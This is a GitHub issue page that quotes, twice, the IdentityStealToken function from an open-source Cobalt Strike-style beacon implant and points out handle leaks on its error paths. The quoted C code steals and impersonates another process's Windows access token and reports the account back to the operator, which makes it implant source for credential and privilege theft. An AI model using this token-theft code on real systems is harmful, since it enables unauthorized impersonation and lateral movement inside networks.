We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CobaltStrike_OpenBeacon/Beacon/identity.c
Line 315 in 93e5703
void IdentityStealToken(char* buffer, int length) { int pid; if (length != sizeof(pid)) return; datap parser; BeaconDataParse(&parser, buffer, length); pid = BeaconDataInt(&parser); HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if (!hProcess) { int lastError = GetLastError(); LERROR("Could not open process %d: %s", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_OPEN_PROCESS_FAILED, pid, lastError); return; } HANDLE hToken; if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken)) { int lastError = GetLastError(); LERROR("Could not open process token: %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_OPEN_PROCESS_TOKEN_FAILED, pid, lastError); ! return; << leaks hProcess } BeaconRevertToken(); if (!ImpersonateLoggedOnUser(hToken)) { int lastError = GetLastError(); LERROR("Failed to impersonate token from %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_IMPERSONATE_STEAL_TOKEN_FAILED, pid, lastError); ! return; << leaks hProcess, hToken } if(!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityDelegation, TokenPrimary, &gIdentityToken)) { int lastError = GetLastError(); LERROR("Failed to duplicate token from %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_DUPLICATE_TOKEN_FAILED, pid, lastError); ! return; << leaks hProcess, hToken } if (!ImpersonateLoggedOnUser(gIdentityToken)) { int lastError = GetLastError(); LERROR("Failed to impersonate logged on user %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_IMPERSONATE_LOGGED_ON_USER_FAILED, pid, lastError); ! return; << leaks hProcess, hToken } CloseHandle(hProcess); if (hToken) CloseHandle(hToken); char accountName[0x200]; if (IdentityGetUserInfo(gIdentityToken, accountName, sizeof(accountName))) { BeaconOutput(CALLBACK_TOKEN_STOLEN, accountName, strlen(accountName)); } }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
CobaltStrike_OpenBeacon/Beacon/identity.c
Line 315 in 93e5703
void IdentityStealToken(char* buffer, int length) { int pid; if (length != sizeof(pid)) return; datap parser; BeaconDataParse(&parser, buffer, length); pid = BeaconDataInt(&parser); HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if (!hProcess) { int lastError = GetLastError(); LERROR("Could not open process %d: %s", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_OPEN_PROCESS_FAILED, pid, lastError); return; } HANDLE hToken; if (!OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &hToken)) { int lastError = GetLastError(); LERROR("Could not open process token: %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_OPEN_PROCESS_TOKEN_FAILED, pid, lastError); ! return; << leaks hProcess } BeaconRevertToken(); if (!ImpersonateLoggedOnUser(hToken)) { int lastError = GetLastError(); LERROR("Failed to impersonate token from %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_IMPERSONATE_STEAL_TOKEN_FAILED, pid, lastError); ! return; << leaks hProcess, hToken } if(!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityDelegation, TokenPrimary, &gIdentityToken)) { int lastError = GetLastError(); LERROR("Failed to duplicate token from %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_DUPLICATE_TOKEN_FAILED, pid, lastError); ! return; << leaks hProcess, hToken } if (!ImpersonateLoggedOnUser(gIdentityToken)) { int lastError = GetLastError(); LERROR("Failed to impersonate logged on user %d (%s)", pid, LAST_ERROR_STR(lastError)); BeaconErrorDD(ERROR_IMPERSONATE_LOGGED_ON_USER_FAILED, pid, lastError); ! return; << leaks hProcess, hToken } CloseHandle(hProcess); if (hToken) CloseHandle(hToken); char accountName[0x200]; if (IdentityGetUserInfo(gIdentityToken, accountName, sizeof(accountName))) { BeaconOutput(CALLBACK_TOKEN_STOLEN, accountName, strlen(accountName)); } }The text was updated successfully, but these errors were encountered: